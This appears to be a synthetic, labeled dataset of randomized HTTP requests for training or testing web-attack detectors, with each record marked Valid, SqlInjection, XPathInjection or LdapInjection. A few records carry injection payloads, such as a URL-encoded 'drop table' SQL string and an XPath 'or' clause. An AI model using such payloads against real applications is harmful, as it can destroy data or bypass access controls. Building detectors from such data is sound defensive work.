Referer: http://eanu.de/iaufh/mneay/lwat/niteh/iYeussst.jpg
TE: trailers,chunked;q=0.4,chunked;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 6.0; eh-9e; rv:1.1.1) Gecko/43259054
UA-CPU: MIPS
UA-Disp: 750,6227,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 701x262
Via: wfrix/2.8 www.tdetxp8e.gif, HTTP/4.8 www.wnezsuo8.jpg, 4.7 www.okxaj.tiff
Transfer-Encoding: compress
Upgrade: lhn/9.1, n2szc/3.8
Warning: 141 72.168.224.187 "venRvrhuuSnNeznp56h2" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 739755
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12082
Start - Id: 18860
class: Valid
GET /rVs/8gbes7eEetnanun/reCetTfetUuEtasE/tfTo5onwt/oMB.Th/ch_CuCmDgCb@Vmw/eBUJxNunW/l36uReb3WfxkkHmDper/eo3hee5esfevlrsslqam.swf?@UDkWou=shnbn1O&hjoonv3ehn5a=to%40z_N&sk=cS5XjLnm0Oh&DkqtriEbk=04553953&fruietlese=h.GA970F&2LDfromOXTu.u=mtn&n9e9oklb3wiYe=2&98OtlhocnKu=aerbsnoo%2Ftez&objectfhttpssi1n=l&a6sshac92mseOa=%2BH HTTP/1.0
Host: 35.160.63.171:750
Connection: keep-alive
Accept: image/*;q=0.3
Accept-Charset: isiri-3342;q=0.3, big5;q=0.3, gb2312;q=0.0, windows-1253, iso-8859-3;q=0.4
Accept-Encoding: compress, compress, gzip, gzip;q=0.7
Accept-Language: oN-eeqicnd;q=0.5, Iaesw3S-bmdwr, t5Rzo-kn
Cache-Control: no-transform
Client-ip: 108.170.236.163
Cookie: kTtrhn=t/rcM;15cBI=teJW;enadiiAeGi=99eoenetcat;rt=roadxp_=ntwe;ihraadiItbu=D1 iNlo&a2lib;v1U3xfnsXEe=9877887
Cookie2: $Version="00"
Date: Sun, 14 Sep 08 10:05:14 GMT
ETag: "8r6osQIs3RbAiDM2"
Expect: 100-continue
From: oiir0@raaeopgcl.it
If-Modified-Since: Sun, 07 Sep 08 13:11:18 GMT
If-Unmodified-Since: Fri, 15 Apr 05 04:12:45 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 19 Apr 09 09:57:50 UTC
Max-Forwards: 0533
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic Z2xucmVpbTpHYXNvdWVrbw==
Authorization: Digest opaque="urietee"
Range: 33-,46-263308
Referer: /avhf/dvfYh/edhRphAa/irIokaDo.zip
TE: trailers
Trailer: Host
User-Agent: d9a9dliah4cege
UA-CPU: PowerPC
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 534x0427
Via: FTP/1.2 167.233.47.24
Transfer-Encoding: compress
Upgrade: sst/1.2, yoeg/0.2, eryeo/8.7, fnres/9.9
Warning: 764 36.12.45.78 "losey4rd3" 
X-Forwarded-For: 77.105.66.53
X-Serial-Number: 584200237476293
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18860
Start - Id: 42614
class: SqlInjection
GET /c6yaiz/7@-Jc8wDsystemeHGYB/tgfDkzNVxk1fBBjkoCE./M7lotoxoVZsAym/hh/4fIeteiepmA6Rshlc7t/9openW@link6H5xv/d7easaNo7wuttn2h/FJYsystemd@6mailQEAuli.css?nesisr4esrmb=imoaonsaato+&qSinsaeatfeu=nullcmdu%29&outm7am=p&N2edye4A=oTls&nncidy=a2ba&amdnlohlyicti=%27%3B+++++drop+++table+npnsegoeeIf&gmg0=i+%24+shtoeybad&mtvfeEkifhTribh=eyEwnf%7Est0oe%27scriptknt&cgn6iai1ekllete=dpshyexech0tOceose&L6hbepjot=i%40Y1M3JO_K95 HTTP/1.0
Host: www.r4ze.de
Connection: tsa2
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.6, deflate;q=0.2
Accept-Language: etelaye-re, ej6r-eUic, ctezaia-tsqmh
Cache-Control: no-cache
Client-ip: 105.113.178.254
Cookie: ayqi0m=a3~ d;1qrn=rvZarj3vkgG
Cookie2: $Version="901"
Date: Fri, 29 Aug 08 12:11:37 GMT
ETag: W/"RpfztADFc0B-kyDZ"
Expect: t9eEetml=oiti
From: auoiBfre@itih.st
If-Modified-Since: Sun, 11 Mar 07 20:47:01 GMT
If-Unmodified-Since: Fri, 01 Jun 07 03:18:48 GMT
If-Match: *
If-None-Match: "dIr2jl7MssNkq5hgxF"
If-Range: *
Max-Forwards: 165
MIME-Version: 0.0
Pragma: yar='sest'
Proxy-Authorization: Basic ZTZhMjpyOGRzeQ==
Authorization: Digest uri=http://c7pehg.gov/wlTmc5eu/2Atai/meaa/st4lt/bneleeEA.fgf
Referer: http://orseavdt.com/ssee/tsey/mchea1tE/ttgd.pl
TE: trailers
Trailer: Authorization
User-Agent: uujXYbqaI http://www.ohos5Mes.uk
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Win95
UA-Pixels: 4720x346
Via: 4.0 53.245.216.186, 1.5 99.250.60.107:95, niIsob/7.2 19.157.217.100
Transfer-Encoding: sseJ7; icrrsiiu=Ro7eGOe
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 727 www.etqrZ.png "o18tm" 
X-Forwarded-For: 32.163.55.249
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42614
Start - Id: 28715
class: Valid
GET /j3a2@euTCpQ6d_olp/GfromPfLii/ySDENeq1u9/htG-7XzJ8oLScQ5/p8T-FZh43Xvbscript/9ydLMjuUt906/on5trl4dnoeRid/enN/ayPb9AyrYX/hUxwMWnP/a0c@zmKUIaQC1pgttZHR/ocbieyrhnm.tiff?yjfhigwjd=hCK26%40XWYQC5&iej=ToV%3C&1cgntLrubli=395&ef=maildrMlupdateaddetmhttpndnon&etIptensl9oE1f=984206&eisUuhvbc7ti=ealpW9&dameNz42r7tt7b=bvo&WrZD8ABY9=scopy%2Fte HTTP/1.1
Host: www.zednheSnrr.net
Connection: close
Accept: video/mpeg;q=0.3, text/html
Accept-Charset: euc-kr, cp-950;q=0.4, iso-8859-6, euc-tw;q=0.5, windows-1254;q=0.2
Accept-Encoding: *
Accept-Language: xb-ecp6
Cache-Control: rr=cgabiY
Client-ip: 178.98.193.61
Cookie: olpegx3tEibxu7h=eN.dID5
Cookie2: $Version="0"
Date: Sat, 06 Sep 08 17:12:50 CET
ETag: W/"ZTtXFp@@SCj_TFuFaKN"
Expect: 100-continue
From: cmNaehb@twerq2.gov
If-Modified-Since: Thu, 16 Aug 07 17:22:23 UTC
If-Unmodified-Since: Wed, 13 Apr 05 15:46:59 CET
If-Match: *
If-None-Match: "aqQsLeSgccV6aDfr"
If-Range: "HGQ5XiWljH5.YQDoagZ"
Max-Forwards: 1
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM dmV5bWFocmthRXJ1bnJmdGVzczNzcHJBZnJoZ25kcmN2RTRhNA==
Authorization: Digest nonce
Range: -5
Referer: /aarerhjy/yaeeqddn.msf
TE: deflate;q=0.5
Trailer: If-Unmodified-Since
User-Agent: teaatha (gglxikM; xOA8.bPpN)
UA-CPU: 68000
UA-Disp: 9543,263,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 621x541
Via: 0.8 www.ntteg.gif, 5.8 www.lebuoR6t.shtml:18457, 3.9 www.ebiih.png
Transfer-Encoding: compress
Upgrade: mptnoI/0.5, iTp4m/8.4, 0hyWd/3.5
Warning: 850 209.179.191.174 "pmem" "Wed, 31 Mar 04 13:18:33 CET"
X-Forwarded-For: 41.255.95.49
X-Serial-Number: 244229732731
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28715
Start - Id: 18475
class: Valid
GET /esx9ieUirthnysrois0n/ecPE7/oi4onaLva/onhRjBqHw@4PV/7xp_Gz78g/OniffnieetryrtR5vha.php?whonodworafde2n=402260&DlmesMfuf76=a&eemwRsdedi=Iobject%3A HTTP/1.1
Host: www.iTavtn.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean, cp-950;q=0.2
Accept-Encoding: compress;q=0.1
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 117.10.196.6
Cookie: jnhaSwhuhtqwc=e8Mn;laei=v@t?;ekbt=&Lie8toztpxaru;4rdeeisfpH=jnniEs;newcvwttiZRncY=s7m 
Cookie2: $Version="4"
Date: Fri, 13 Apr 07 09:34:34 CET
ETag: W/"kcQq-97mGk7WVeND3ug"
Expect: 100-continue
From: ee1e@sacey.de
If-Modified-Since: Thu, 21 Apr 05 11:27:34 CET
If-Unmodified-Since: Fri, 08 Jun 07 04:50:45 GMT
If-Match: *
If-None-Match: "pnYK21Tvs2hrbYv"
If-Range: "C2JVHl8ZVPfAP15"
Max-Forwards: 728
MIME-Version: 1.9
Pragma: e5pejj='us'
Proxy-Authorization: Tlld muno=taet
Authorization: Digest cnonce="9Nlhaaeo"
Range: 72-79
Referer: http://www.pdstEi.ch/yneh/fnaOrcF/e5f19ltr/W1se.tiff
TE: chunked;q=0.8,deflate
Trailer: Via
User-Agent: Mozilla/1.9 (Machintosh; U; PPC Mac OS X 1.4; ne-PC; rv:0.4.6) Gecko/04152309
UA-CPU: PowerPC
UA-Disp: 1147,7434,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 934x751
Via: FTP/5.5 240.8.236.13
Transfer-Encoding: gzip
Upgrade: obxu/3.0
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 238.93.64.167
X-Serial-Number: 63866719
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18475
Start - Id: 35693
class: XPathInjection
GET /wDfidUM83geRylog/OTU0nph-optOWAo/iZD/ankt4vTwttC3XzF/ec33EJFhd@uKQ/lhREBGPwTwQ8h.exe?R3OJ=osock_streamcko0ndbindf&rrtiNjum=2ultiroorcron&me4rw=ceXdserescmintran&ccExml3yz2YT=%7EMeeconnectd&m4Rl3rauliesah=468&5dYmochad=raelB%27+++++or+++ntm%2Foeno%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D98%5D+++++or+++++%27oANnt%27%3D++%27 HTTP/1.0
Host: www.atsc9se.ch
Connection: asrpMnwt
Accept: application/*, audio/x-wav, image/*;q=0.3
Accept-Charset: iso-8859-6;q=0.7, macintosh, windows-1257;q=0.1, koi8-r, iso-8859-9
Accept-Encoding: *
Accept-Language: on-7g6si, u-osza;q=0.6
Cache-Control: no-transform
Client-ip: 50.131.48.51
Cookie: goprlu=nnsnwi9wosce;alys=eolauvE6ftby
Cookie2: $Version="0"
Date: Fri, 07 Mar 08 18:31:29 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: fbtsncr
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Fri, 06 Feb 09 22:26:13 UTC
If-Unmodified-Since: Wed, 27 Jun 07 11:43:23 GMT
If-Match: *
If-None-Match: "mm6dNQHYasjuP@O7k"
If-Range: *
Max-Forwards: 5
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM Nm9LZW05b2hud3NldTBzbWxlbnplYWVidEYyZGVXQWRkbmlsb1Vua2xuMHNybnRl
Authorization: Basic aWJVZnRpOmVmaEU=
Range: 5225-,8-9,1-
Referer: /L7estmm/DppTne/ETieovpq.avi
TE: chunked
Trailer: Accept-Charset
User-Agent: Mozilla/4.5 (Machintosh; U; Mac OS X 7.7; cf-rh; rv:7.3.8) Gecko/61549112
UA-CPU: PowerPC
UA-Disp: 9150,2216,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: FTP/3.8 176.165.200.193
Transfer-Encoding: identity
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 211.136.86.197
X-Serial-Number: 727389738621693748
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35693
Start - Id: 37521
class: LdapInjection
PUT /qOewsns/ouiBnd/0Qj0/t4XTl1iu/Yr2group by8REEdh_Msdh/eDen.jpeg? HTTP/1.0
Content-Length: 261
Content-Language: Ja
Content-Encoding: deflate
Content-Location: http://4rMNi5.cz/eutsm/3ir7tT/rrdnld8t.jsp
Content-MD5: OXQxY3RlYWxjZEFrc3Jobg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 May 09 08:08:37 CET
Last-Modified: Fri, 20 Apr 07 20:09:18 CET
Host: www.tbn8nee.net:2
Connection: mimsncsr
Accept: application/x-tar;q=0.7
Accept-Charset: *
Accept-Encoding: identity, gzip, identity;q=0.8, compress, gzip
Accept-Language: tyeoe7a-tg;q=0.1, s4ti-ede, 6tewwa-Pu, ewwj6nb-tSrdiq, nieqi-es
Cache-Control: min-fresh=060
Client-ip: 244.64.43.249
Cookie: N84dnnhthangB=73405;pafaPeIrpau=ead;oiEho4ete=4095106;hniAdP1oeu=eFfin5l;oTar=hf
Cookie2: $Version="192"
Date: Sat, 04 Nov 06 06:50:37 CET
ETag: "u34qWBiJNpxKq9A"
Expect: 100-continue
From: tisu@inUeyeh.org
If-Modified-Since: Sun, 20 Nov 05 13:45:31 GMT
If-Unmodified-Since: Tue, 05 Dec 06 13:53:45 CET
If-Match: "cwXPK.00F4rWBLp"
If-None-Match: "cQz-Fch762z5wWVa"
If-Range: Sun, 20 Dec 09 06:49:17 UTC
Max-Forwards: 06
MIME-Version: 0.6
Pragma: rU='6tge'
Proxy-Authorization: NTLM NWkxZXN3eXNodGFpb25zTnJnbG5UZTdyaEVhd3Jhc3lyeWVJ
Authorization: NTLM c211ZlRlY0UzNVpwdGltQmVsZm90YmV0ZndmdHRjc3RlYW05c3pydVphZXRlbDk=
Range: 0516-7855,069180-,334-
Referer: /uasYo2/esnaD/ttxsh.avi
TE: gzip;q=0.5,deflate;q=0.1,trailers
Trailer: Connection
User-Agent: Mozilla/2.8 (compatible; ienoiislnn; SunOS sun4u; noeSwrieT; ooadosnili)
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 2665x9772
Via: 6.4 95.218.183.57, 9.7 104.205.119.33:0
Transfer-Encoding: gzip
Upgrade: c0e/0.5, ndgd/9.1
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569
----: ----------------
~~~~~: ~~~~~~~~~~~~

5dJPBr=688815&drbrOcb2lrsaf=aeeooshEa~&bmat4uo=+rbu&d0eUnnke2pdski=hk7&shpuo=)  (    | (tu=dp4f*)&Iteytfs=dwao&di1lt4o=idtpssal&emarhokn=iYYZfQ7eXtV2&letaousaa3=phpe=ol&bhiamaav=t50&t7hrbe9eb=71&reilIieeaaeCt5=isbonets9t&wpImtm=573&lbE0sh=aeer

End - Id: 37521
Start - Id: 298
class: Valid
GET /oP/sQNupdate6wLperllink6/tmpF7zbieXPWEMu/wBZI0_A/pte/rstytsrspsolranhrl/aZbXj0NE1eFnnJ_/utatrLlnsKi3ekpWe8m/ae.jsp?sTs=38895&itN=i%3DnhnrrseqedechoPwindow.openl&rr7utgrnt8emysi=409925&iB9DPvP=u%40RSMp&eer7swq=nRntlnsMyj2oEh&f2t=1251989&rMpunnfaalt=pf&olhdmrle=+%3A&by2otso9=4582242&n4Robntsse=2ghe&di7ehle8oWew=%28eae&otorre=5&rlutrtpIr=89851 HTTP/1.0
Host: 201.27.19.128:0153
Connection: close
Accept: video/*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: izfqefe7-eop;q=0.9, ho-bws
Cache-Control: i=jrxhOn
Client-ip: 24.182.70.145
Cookie: sesgls7uqiYieae=41828528;4fnpn79isicte=81;LGmail-m=chgtio
Cookie2: $Version="63"
Date: Thu, 28 Feb 08 19:42:29 GMT
ETag: "k_i2PsOOl.UP9puy.cK"
Expect: 100-continue
From: atOG@okZhh.fr
If-Modified-Since: Wed, 28 Jun 06 11:26:21 GMT
If-Unmodified-Since: Mon, 08 Dec 08 12:04:10 CET
If-Match: "LO4.HevVPArLrxtr5HpB"
If-None-Match: *
If-Range: *
Max-Forwards: 053
MIME-Version: 2.9
Pragma: eH3otsm='mhhcs'
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: NTLM VHZuTW9kdG9pOHRlbGg3Y250b013ZW1hY3NsYWNoQWloaGVub2pzbg==
Range: 813-,088-
Referer: /0vTghssm.sh
TE: gzip;q=0.3
Trailer: Expect
User-Agent: yQLSOzpVk_ http://www.it6rl.st
UA-CPU: x86
UA-Disp: 2593,723,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4622x2387
Via: 5.3 www.oyEe03ee.jpg
Transfer-Encoding: identity
Upgrade: aeeh/6.3, fgRaE/4.4
Warning: 115 www.hone.jpeg "q3i0Eo0DcebhmerEuNtI" 
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 94210
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 298
Start - Id: 20789
class: Valid
GET /uVyDBTDaeYbk9Z/eHIVrriBY0qLZzjzC/arr.exe?sytbnh8wNu=n+h&uos=viCzAolmdn&i1pfsrhusc=nniley5e+7wdE&rhree2oh9ooteo=-eItunion&er2aoirOrqcsajn=lVRDNYkDlyzK HTTP/1.1
Host: www.tnat6.ch
Connection: fesf
Accept: image/*;q=0.7, application/*;q=0.9
Accept-Charset: gb2312;q=0.8, iso-8859-2;q=0.8, x-mac-cyrillic, iso-8859-3;q=0.7, windows-1254
Accept-Encoding: identity;q=0.6, deflate;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 104.130.72.27
Cookie: 5_Fiqk=o70h;iwxviHnlAXu=nJotweraen;rusammee0mgabub=ohome;cxime9sniu4i=iFp_H3PHc
Cookie2: $Version="61"
Date: Fri, 30 Jun 06 05:51:57 GMT
ETag: "SxxezlG.P77kXg5s"
Expect: 100-continue
From: txeT@aevntoegn.com
If-Modified-Since: Thu, 12 Nov 09 03:17:57 UTC
If-Unmodified-Since: Sat, 29 Dec 07 16:32:47 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 06 Aug 06 07:47:29 UTC
Max-Forwards: 347
MIME-Version: 3.7
Pragma: ctNl='rrlztn'
Proxy-Authorization: NTLM YW5vbWR6NWVkbGJpeXV6c3N5dml1NmlsZWZuZXVob28xZHJtZzRsc2VzZW82
Authorization: NTLM bmlMM25lc2Z2ZnJvN2R5YWlscm9pdGU5cmxpZXRmcFNlZWVlU2l0QWx0cGQ=
Range: 468072-,7838-92,92-4796
Referer: /Eai8mkad/itdmES5w/sea4/7pnre8ey/ghrmO1.gz
TE: trailers
Trailer: Range
User-Agent: Mozilla/2.7 (Machintosh; U; PPC Mac OS X 1.2; ih-ae; rv:5.3.9) Gecko/42151486
UA-CPU: Sparc
UA-Disp: 369,7940,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2009x4676
Via: 1.8 101.137.113.159, 3.8 130.102.189.58:47
Transfer-Encoding: compress
Upgrade: Mdfomo/1.8, o7nea/3.7
Warning: 382 www.ansbT.htm "haeTtpIHaan" "Fri, 12 Aug 05 07:42:57 CET"
X-Forwarded-For: 108.43.64.172
X-Serial-Number: 39917227024822129
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20789
Start - Id: 878
class: Valid
GET /au_mhrQabkcNS7/fecad.js?aoq8iar=tf%3Dnn5Xblg+oa&fflpn=9RC&ttRoe4taua=%2Fe2wonenm0ieh1r&X7bvOw=i3+eUht%24wcatF&VLCwNOQI11Sa=0&ja55uilaaoe=w%3CPzf+ngmwi%281y%3B&b@9Q1S=1Htrb+%7Ei%3FadminoT%258gCi%3F HTTP/1.1
Host: 5.85.11.164
Connection: wzjq
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 200.138.242.236
Cookie: btsmRehtA=eG=t;nti9vdq=20583625;node2ZEALU=anntnchu;oeS=ote~;drop5yV=xnmu
Cookie2: $Version="2"
Date: Mon, 02 Feb 09 04:12:12 UTC
ETag: W/"0UHLnbcZRZDpejE"
Expect: 100-continue
From: deiSLdc@enaitimcoi.fr
If-Modified-Since: Tue, 18 Aug 09 03:09:09 CET
If-Unmodified-Since: Sun, 20 Sep 09 05:32:23 CET
If-Match: "zvOimpbQplE1b2DUoH"
If-None-Match: *
If-Range: Sun, 28 Dec 08 17:45:01 GMT
Max-Forwards: 282
MIME-Version: 0.0
Pragma: 8ws='ni'
Proxy-Authorization: Basic OXhsczppOWFhZmVh
Authorization: Basic M2ZkZmk6bzBsZQ==
Range: 95471-
Referer: http://www.oes8qrNz.biz/heeog.wav
TE: trailers,gzip,chunked
Trailer: Authorization
User-Agent: Mozilla/6.3 (Machintosh; U; PPC Mac OS X 4.0; ap-Ee; rv:2.3.7) Gecko/59363997
UA-CPU: 68000
UA-Disp: 1675,0086,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 130x106
Via: FTP/6.7 www.NoeRtxt.gif, HTTP/5.9 www.donwfEE.jpg:213, HTTP/1.8 223.41.133.44
Transfer-Encoding: compress
Upgrade: 3orSlt/1.8, ndNfp3/7.7
Warning: 739 www.M13tf.tiff "wbiCnlbr1oeamRa0" 
X-Forwarded-For: 44.170.70.161
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 878
Start - Id: 34935
class: Valid
POST /gbF@em74-nzDKcs7sc/9htZoeOtgeou/pedehot5t/eo31mi7U0HMd2sBmk.p/1rP3qmKqCIZwN/sErt.cfm? HTTP/1.0
Content-Length: 226
Content-Language: oIl
Content-Encoding: deflate
Content-Location: http://www.ei9eeha.cz/rgcpeau/rrezonR0/msIleOt/uinno.pl
Content-MD5: YXRremltc25iYWU5YXRBRA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Mar 05 22:46:08 GMT
Last-Modified: Mon, 17 Aug 09 18:50:05 UTC
Host: 17.235.169.27:80
Connection: vtgyen
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a-nsa0
Cache-Control: only-if-cached
Client-ip: 253.250.214.170
Cookie: mnbauoo0ht7=sky;3o.WSc.W0between6= iir;mMnrc5pntr=010;fetbaoelrOOnaea=-@eeobtobject voptelnetaa;go=800;hEsycaqhpor=i(i0
Cookie2: $Version="916"
Date: Sat, 07 Feb 09 03:05:55 UTC
ETag: "Hqp6pur1VB41y-Y"
Expect: ncCs9wt=rTxL;cide=txRe3
From: sdqf@ierMt4h.ch
If-Modified-Since: Tue, 06 Jul 04 02:49:59 UTC
If-Unmodified-Since: Wed, 18 Jun 08 23:48:17 UTC
If-Match: *
If-None-Match: "KVmKFbFfNO2SfFPg"
If-Range: *
Max-Forwards: 530
MIME-Version: 9.6
Pragma: hezg=NHwt
Proxy-Authorization: Digest qop=auth
Authorization: 0l3nto iVebi=eyas1swr
Range: 26302-,-510,4934-
Referer: /ti0no0/oicP/sad1/iycaG.pl
TE: deflate
Trailer: If-None-Match
User-Agent: gn6eUtre (ouRVr2; tjm0vdR)
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2377x8201
Via: tEenc/3.3 www.A9Or5re.html
Transfer-Encoding: deflate
Upgrade: yeadoo/9.1, ynen/6.6, egnCa/7.9, uis/6.9
Warning: 359 www.njae1.jpeg "gttepstwaI" "Wed, 09 Dec 09 02:56:18 UTC"
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 61683738419
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hlass=42153&newSqo=Eyoeaar46E&Nttseiant6is=unNaRsatxrtahIunph&d6t=5392330&eo1tu9i=eu5z0N4SJXF&ESPusg=orao sal&SMGiigKKNbL=00&bpmn=spr\fhs$&vrq=42et1e]npnnaa&IhDanLIE97H=otd&tliiny4lqatstlz=ereplacet&iEadNlondoadeo=062499

End - Id: 34935
Start - Id: 978
class: Valid
GET /tanb1aY6aeiGm/tDjkV.vrH8J7FpUYKl/sheildncNfarse/rQirhFTPJzwL_fbWlK/aeIahstd/oosOhlhtsbosb.msf?e7et1=0&ennAwma=rVHQP&etwxhod2=Eoabbhlfeteicn8owe&pPHRphpcatid=sV1a8d3G&jinEayaiOlDxabc=yIautoexectpsEs5emnee%7Cna&Rfsslrt=oin&sqe=OuElog%5Dlaccess_logeehomet+&EpllatIfipsiseU=43931&4dit=anp&euqaAt=74406&PpasswdkMeXs7=a8Sv4neBA&ozqozafiEjrd1sm=111166&eeenhnegtvalfr=egiAeef1+hT&qmyhs=a6e0baes4moQH&oed=11672 HTTP/1.1
Host: 104.242.165.101
Connection: dAgqu6f
Accept: audio/basic, application/x-tar
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=332
Client-ip: 193.35.188.230
Cookie: -1rhomeUiTWpsU= irfenene;h9A5tcbm=u9s;eShy=oaPaOfOw;0zr-documentAvb4=3267491
Cookie2: $Version="98"
Date: Sun, 02 Jul 06 17:51:21 UTC
ETag: "ELdOJzom_LZ@.9w2x"
Expect: loguol7y
From: drgltVi@44huhi.be
If-Modified-Since: Mon, 27 Feb 06 10:53:51 GMT
If-Unmodified-Since: Sat, 03 Jan 09 23:28:15 GMT
If-Match: *
If-None-Match: "tH3YWcwJiBpyBLb"
If-Range: "6PzdH26MDQ9dfQC"
Max-Forwards: 39
MIME-Version: 5.4
Pragma: n=Udenzmni
Proxy-Authorization: amit hx71ti9=tovd
Authorization: NTLM amluaU9lbmhhM2U1aW90cnBzeGFsbDdkYm5hU3Vmcm4=
Range: 861-
Referer: /tbhs/1osnl/hcnso/aasbTE.txt
TE: trailers
Trailer: Connection
User-Agent: Mozilla/0.7 (compatible; MSIE 7.6; Open BSD i586; y5krm1ca; EHwosd; uh3eeuDmC)
UA-CPU: MIPS
UA-Disp: 419,762,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 873x994
Via: 2.0 242.76.136.33
Transfer-Encoding: identity
Upgrade: speh/3.3, Eai/0.1, hYun/9.4, uabeh/7.5, 8re3/1.6
Warning: 489 28.201.135.102 "oeblo5shaei" 
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 045784
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 978
Start - Id: 16410
class: Valid
GET /nomjLlV/.P3ftpMxu2Vp/srdhxptgOan5i/nbaEaycsh/tnW/uDEtogarmsd/tAficwhariyinsc/t6.mdb? HTTP/1.0
Host: 70.233.144.157
Connection: nnwv
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: n2ool-syh0w;q=0.8, o-xtyr;q=0.3, lenA7ie-4decw;q=0.9, i-a
Cache-Control: only-if-cached
Client-ip: 129.156.31.222
Cookie: latG=eeSd3k1reinnpTo;ocsoeaeeDbiE=sfeieho/;;nmsri0iPc=hCqn<uotofdtha;iE4litEHHoH=eAhavingt0amec9es;8openFDd==e;aaTsots4iM=scUme
Cookie2: $Version="92"
Date: Mon, 09 Jun 08 15:45:47 GMT
ETag: W/"_smcwUlFm.TISm7S0F"
Expect: rluledh=ra3hni3b;hF3jtc
From: setosoE@eiteajn.be
If-Modified-Since: Tue, 15 Sep 09 10:10:09 UTC
If-Unmodified-Since: Sun, 04 Oct 09 19:05:26 GMT
If-Match: "v1yudLbNIx@nYsD"
If-None-Match: "8KZMXtAuK9odLyAEtpi"
If-Range: *
Max-Forwards: 262
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM czJUaTVld0hpZ2gxbjhnbnAyMWd0aTduaXJudWVFUWVydGFpc3M=
Authorization: NTLM bjh2am1haGx1ZWF2bm55bkNlaGlyaFRhYWZzaDNzU3VldTZIb054QWE=
Range: -1
Referer: http://www.oi0swt.com/emdjl/se8eovAt/nwmhtste.htm
TE: deflate;q=0.6,deflate
Trailer: Expect
User-Agent: Mozilla/0.1 (X11; U; Solaris 8.3; we-8V; rv:2.5.8) Gecko/68081412
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9846x663
Via: 6.0 www.i4iGw.shtml, 5.8 88.204.159.152:617, g8veet/7.3 79.180.223.67
Transfer-Encoding: identity
Upgrade: f0v/2.9, s8dtN/9.2
Warning: 481 www.dsiixEh.shtml:370 "isiipeE" 
X-Forwarded-For: 131.177.35.234
X-Serial-Number: 493178
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16410
Start - Id: 37543
class: LdapInjection
POST /eRS/yleiue3pkreIs/3samk2acP/aboetd3ia6soIhiabte/gwilohuYfwatinv/5sosi/sR4Sh2iZYRRzKP5NMP/ekTsIHoFtfNx3W/iluEi/sYjtjAe/e7.mdb? HTTP/1.0
Content-Length: 159
Content-Language: lo,sHazl2mu
Content-Encoding: identity
Content-Location: http://www.negdiofo.uk/0aoh/ni2ebpt.png
